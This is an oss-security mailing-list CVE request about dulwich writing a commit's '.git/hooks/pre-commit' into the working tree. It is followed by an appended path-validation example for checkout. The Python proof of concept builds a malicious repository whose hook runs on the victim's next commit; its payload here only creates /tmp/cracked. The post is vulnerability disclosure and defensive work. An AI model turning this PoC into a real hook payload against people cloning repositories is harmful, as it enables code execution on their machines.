Date: Sat, 21 Mar 2015 10:26:24 +0100
From: Salvatore Bonaccorso <carnil@...ian.org>
To: OSS Security Mailinglist <oss-security@...ts.openwall.com>
Cc: CVE Assignments MITRE <cve-assign@...re.org>,
	Jelmer Vernooij <jelmer@...ian.org>
Subject: Possible CVE Request: dulwich: does not prevent writing files with invalid paths from commits to the working tree

Hi,

While looking at CVE-2014-9390 I noticed
https://lists.launchpad.net/dulwich-users/msg00827.html for dulwich reported by
Gary van der Merwe. Does the scope of CVE-2014-9390 also include these bits
from the above:

dulwich happily clones a repository which contains a commit with invalid
paths, say .git/hooks/pre-commit, thus allowing execution of code on
subsequent commits.

----cut---------cut---------cut---------cut---------cut---------cut-----
dummy@...:~$ python PoC.py 
dummy@...:~$ dulwich clone PoC.git foo
Counting objects: 5, done.
Compressing objects: 100% (2/2), done.
Total 5 (delta 0), reused 5 (delta 0)
Checking out HEAD
dummy@...:~$ cd foo/
dummy@...:~/foo$ git commit -m "test" --allow-empty
You just got cracked! (not really but you could have been!)
[master 9588153] test
dummy@...:~/foo$ ls -l /tmp/cracked 
-rw-r--r-- 1 dummy dummy 0 Mar 21 10:24 /tmp/cracked
dummy@...:~/foo$
----cut---------cut---------cut---------cut---------cut---------cut-----

Upstream (Jelmer Vernooij) has fixed this with commit

https://git.samba.org/?p=jelmer/dulwich.git;a=commitdiff;h=091638be3c89f46f42c3b1d57dc1504af5729176

Does this need a separate CVE from CVE-2014-9390? 

Regards,
Salvatore

#!/usr/bin/env python2
# PoC: build a bare repository whose only commit carries a root tree entry
# named ".git". A dulwich clone (before the fix referenced above) writes that
# subtree into the working tree verbatim, so .git/hooks/pre-commit lands in
# the victim's real .git directory and runs on their next `git commit`.

import os
import time

from dulwich.repo import Repo
from dulwich.objects import Blob, Tree, Commit, parse_timezone

repo_dir = 'PoC.git'
os.mkdir(repo_dir)  # Repo.init_bare() expects an existing, empty directory
repo = Repo.init_bare(repo_dir)

# The hook body that ends up executable at .git/hooks/pre-commit.
evil_file = Blob.from_string("""#!/usr/bin/env python
import subprocess
subprocess.call(["/bin/touch", "/tmp/cracked"])
print('You just got cracked! (not really but you could have been!)')
""")

# hooks/pre-commit: regular executable file (mode 100755)
hooks_tree = Tree()
hooks_tree.add('pre-commit', 0o100755, evil_file.id)

# .git/hooks: subtree entry (mode 040000) named "hooks"
git_tree = Tree()
git_tree.add('hooks', 0o40000, hooks_tree.id)

# Root tree carrying the entry name ".git" that git itself would never write
root_tree = Tree()
root_tree.add('.git', 0o40000, git_tree.id)

commit = Commit()
commit.tree = root_tree.id
author = "Dr. Evil <drevil@...xxxxxxxx>"  # address redacted in the archive
commit.author = commit.committer = author
commit.commit_time = commit.author_time = int(time.time())
tz = parse_timezone('-0200')[0]
commit.commit_timezone = commit.author_timezone = tz
commit.encoding = "UTF-8"
commit.message = "Evil commit"

# Write every object (blob, three trees, commit) into the object store in one
# pass; the second tuple element is the optional path hint, unused here.
repo.object_store.add_objects([
    (evil_file, None),
    (hooks_tree, None),
    (git_tree, None),
    (root_tree, None),
    (commit, None),
])

# Point master at the commit so a plain `dulwich clone` checks it out.
repo.refs['refs/heads/master'] = commit.id
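The check a checkout routine needs is the one the PoC above shows missing: every tree path must be validated before anything is written under the working tree. The following is an added example, not dulwich's own fix from the commit linked above. It flattens a commit's tree and rejects entries whose path could escape the working tree or alias the `.git` directory, covering the case-insensitive, NTFS 8.3 short-name (`git~1`) and HFS+ ignorable-character variants that CVE-2014-9390 addressed on the git side. Assumptions: the `HFS_IGNORABLE` list is reproduced from memory of git's HFS+ check and is not authoritative; `TreeEntry` and `FakeTree` are stand-ins shaped like dulwich's `TreeEntry` and `Tree.iteritems()` so the example runs without dulwich installed; the sample object store is constructed for this example.

```python
"""Tree-path validation before checkout of an untrusted commit.

Added example (not dulwich's actual fix): flatten a commit's tree and refuse
any entry whose path could escape the working tree or land inside .git.
"""
import re
import stat
from collections import namedtuple

# Code points HFS+ ignores when comparing names; git strips them before
# testing a component for ".git". Reproduced from memory: an assumption,
# not a specification.
HFS_IGNORABLE = frozenset(
    [0x200C, 0x200D, 0x200E, 0x200F,
     0x202A, 0x202B, 0x202C, 0x202D, 0x202E,
     0x206A, 0x206B, 0x206C, 0x206D, 0x206E, 0x206F,
     0xFEFF])

# NTFS 8.3 short names that alias ".git" (GIT~1 .. GIT~9), per CVE-2014-9390.
NTFS_SHORT_GIT = re.compile(r"^git~[1-9]$", re.IGNORECASE)

# Same field names as dulwich.objects.TreeEntry, so a real dulwich object
# store also works with flatten_tree(); defined here to run offline.
TreeEntry = namedtuple("TreeEntry", ["path", "mode", "sha"])


def is_dotgit_component(name):
    """True if one path component would resolve to the .git directory on
    some filesystem: exact, case-folded, NTFS trailing dot/space stripped,
    HFS+-ignorable characters removed, or an NTFS short name."""
    folded = "".join(ch for ch in name if ord(ch) not in HFS_IGNORABLE)
    folded = folded.rstrip(". ")  # NTFS drops trailing dots and spaces
    return folded.lower() == ".git" or NTFS_SHORT_GIT.match(folded) is not None


def invalid_path_reason(path):
    """Return None if `path` may be written under the working tree, otherwise
    a short reason. Tree paths use git's forward-slash separator."""
    if not path:
        return "empty path"
    if "\0" in path:
        return "NUL byte"
    if path.startswith("/") or "\\" in path:
        return "absolute path or backslash separator"
    for comp in path.split("/"):
        if comp in ("", ".", ".."):
            return "empty, '.' or '..' component"
        if is_dotgit_component(comp):
            return "component resolves to .git"
    return None


def flatten_tree(store, tree_sha, prefix=""):
    """Yield (path, mode) for every non-tree entry below tree_sha.
    `store` maps sha -> object whose iteritems() yields TreeEntry-shaped
    records (dulwich's object_store does). Byte names are decoded with
    surrogateescape so unusual bytes still reach the check."""
    for entry in store[tree_sha].iteritems():
        name = entry.path
        if isinstance(name, bytes):
            name = name.decode("utf-8", "surrogateescape")
        full = prefix + name
        if stat.S_ISDIR(entry.mode):
            for item in flatten_tree(store, entry.sha, full + "/"):
                yield item
        else:
            yield full, entry.mode


def checkout_plan(store, tree_sha):
    """Split a tree into (safe, rejected); rejected is [(path, reason), ...].
    A checkout honouring this plan writes only `safe` and aborts when
    `rejected` is non-empty instead of silently skipping."""
    safe, rejected = [], []
    for path, mode in flatten_tree(store, tree_sha):
        reason = invalid_path_reason(path)
        if reason is None:
            safe.append((path, mode))
        else:
            rejected.append((path, reason))
    return safe, rejected


class FakeTree(object):
    """Stand-in for a dulwich Tree: holds TreeEntry records (assumption)."""
    def __init__(self, entries):
        self._entries = entries

    def iteritems(self):
        return iter(self._entries)


def demo_store():
    """Constructed object store: the PoC layout (.git/hooks/pre-commit) plus
    case, short-name, HFS+ and traversal aliases of the same attack."""
    return {
        "root": FakeTree([
            TreeEntry(".git", 0o40000, "dotgit"),
            TreeEntry(".GiT", 0o40000, "dotgit"),
            TreeEntry("git~1", 0o40000, "dotgit"),
            TreeEntry(".git\u200c", 0o40000, "dotgit"),
            TreeEntry("..", 0o40000, "dotgit"),
            TreeEntry("README", 0o100644, "blob1"),
            TreeEntry("src", 0o40000, "src"),
        ]),
        "dotgit": FakeTree([TreeEntry("hooks", 0o40000, "hooks")]),
        "hooks": FakeTree([TreeEntry("pre-commit", 0o100755, "blob2")]),
        "src": FakeTree([TreeEntry("main.py", 0o100644, "blob3")]),
    }


if __name__ == "__main__":
    safe, rejected = checkout_plan(demo_store(), "root")
    for path, mode in safe:
        print("write   %s (%o)" % (path, mode))
    for path, reason in rejected:
        print("REJECT  %s: %s" % (path, reason))
```

Against a real repository the same walk is `checkout_plan(repo.object_store, repo[commit_id].tree)`; the point of validating the flattened path rather than each tree level in isolation is that a `.git` component is just as dangerous under `docs/` as at the root, and a `..` component anywhere defeats a root-only check.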
